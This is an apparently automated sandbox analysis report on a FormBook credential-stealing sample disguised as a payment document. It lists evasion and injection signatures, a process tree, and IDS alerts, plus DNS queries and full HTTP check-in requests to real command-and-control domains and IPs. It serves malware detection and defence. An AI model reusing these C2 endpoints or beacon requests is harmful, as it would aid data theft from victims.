Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name: Payment&WarantyBonds.exe
(renamed file extension from bat to exe)
Original sample name: Payment&WarantyBonds.bat
Analysis ID: 1545791
MD5: a9da1b42f6ad80ee6085f69e6c25f49b
SHA1: e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256: 4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment&WarantyBonds.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
    • Payment&WarantyBonds.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
      • lVlYtqLlYCJP.exe (PID: 3264 cmdline: "C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systeminfo.exe (PID: 7876 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
          • lVlYtqLlYCJP.exe (PID: 3132 cmdline: "C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.Payment&WarantyBonds.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: Payment&WarantyBonds.exe, ReversingLabs: Detection: 45%
                Source: Payment&WarantyBonds.exe, Virustotal: Detection: 40%
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: Payment&WarantyBonds.exe, Joe Sandbox ML: detected
                Source: Payment&WarantyBonds.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lVlYtqLlYCJP.exe, 00000006.00000000.1945290809.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099378604.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\systeminfo.exe, Code function: 7_2_005CC500 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\systeminfo.exe, Code function: 4x nop then xor eax, eax (7_2_005B9E20)
                Source: C:\Windows\SysWOW64\systeminfo.exe, Code function: 4x nop then mov ebx, 00000004h (7_2_04A004DE)

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49793 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49809 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49905 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49905 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49989 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49989 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49861 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49941 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49825 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49825 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80
                Source: DNS query: www.030002059.xyz
                Source: DNS query: www.xipowerplay.xyz
                Source: DNS query: www.091210.xyz
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 20.2.249.7
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: AMAZON-02US
                Source: Joe Sandbox View, ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
                Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.iampinky.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3ej6/?78=Gf4n60vPMxeL0A+d5GBWdueSYaV7AAF6sYlT7O2otcMNGwtil4ITBlU9iT/EVO+vtwlhWFB1C/mfTw8URcWhMQgTObTwj1m/ib0JAzzbicsZX3cTLGstzzo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cotti.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /diem/?hrOd=1DzdIBZXhZaHw2Wp&78=6kQoSQEqBTKFeIgPWItcwMtJ6+nSmUORx6o6L7StlLAM0wJa+kMHFj5rDbCqKJO5phAeVuacSteB2VMr/yCaTx+wFCn7HbSrd9uZdvfw4QtNwXqKd1ZsMRg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.solarand.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /2sun/?78=HFv57CWzV4D1L9ubGrUw/N+LZZ6BniYLjcS4cRbGENzhA3BKZjtgqnC6wzdpxcsL4M445YXmdmOqKzt/9+uXSXCfKbs+tX0lmfcjUf3N9oWc/wvfMeYS2jQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.030002059.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /akxn/?hrOd=1DzdIBZXhZaHw2Wp&78=bVCpbCQOZK8RJSSOpbtjW6178FykoGhXFODVqYypnT+nS+pakzyDZ3G2gJzbbKB5bmDBooJSbxoFgw5n88RQ4gN+spy4B3V2SPR8yfMM1NLM4EIxe0ofqks= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.xipowerplay.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.stationseek.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jwed/?hrOd=1DzdIBZXhZaHw2Wp&78=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.091210.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.adsa6c.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.simplek.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.297676.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /dma3/?hrOd=1DzdIBZXhZaHw2Wp&78=IhPPRAmDChEnx8G5Mk3wYKJVvliqClSy7lT3/i9hniKwN2WP3nmtzIAyaYX2MoR3jQRU/NaT7iTCvd3O/fPSuEFMVnQWNGAOAVxjgpJaGw2AUh+P10Czoew= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cesach.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3xn5/?78=hLX784qEA4n55Q1oGw1olOPE1jv2cb5vRwpnfGUpuE0YTY8y9L6/CN63cm0behm+qDJgSuJj8e8DxEJz6zH1lBsEYFc4WGfLLcwXK2bqtXGi64JZ82gh2/U=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.basicreviews.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /33ib/?hrOd=1DzdIBZXhZaHw2Wp&78=AYOfApeu9cghctp2i/KTSy5LkW4tz9x7+arej5d+r0NkQieZykYOddwLhoh5ni50J8Z5WiAS8Adn1ZwJ2laV/jmSd394ohUQohZCg1IJ+kicD56x/bghldI= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.sgland06.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /jr4j/?78=/uHXlXwxCWKagG2f+cMqJk/ouEnshdx+b5P4XSvx6MlJZzR/8pbZgxPfuPQh+b7XVC9rmLmVxzweaBtr7+wSxihG8Hktp9qijzhrRRKR+f0leSIT4/3X8Bo=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.extrime1.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                Source: systeminfo.exe, 00000007.00000002.4107343980.0000000006128000.00000004.10000000.00040000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000008.00000002.4106767414.00000000039D8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficDNS traffic detected: DNS query: www.iampinky.info
                Source: global trafficDNS traffic detected: DNS query: www.cotti.club
                Source: global trafficDNS traffic detected: DNS query: www.solarand.online
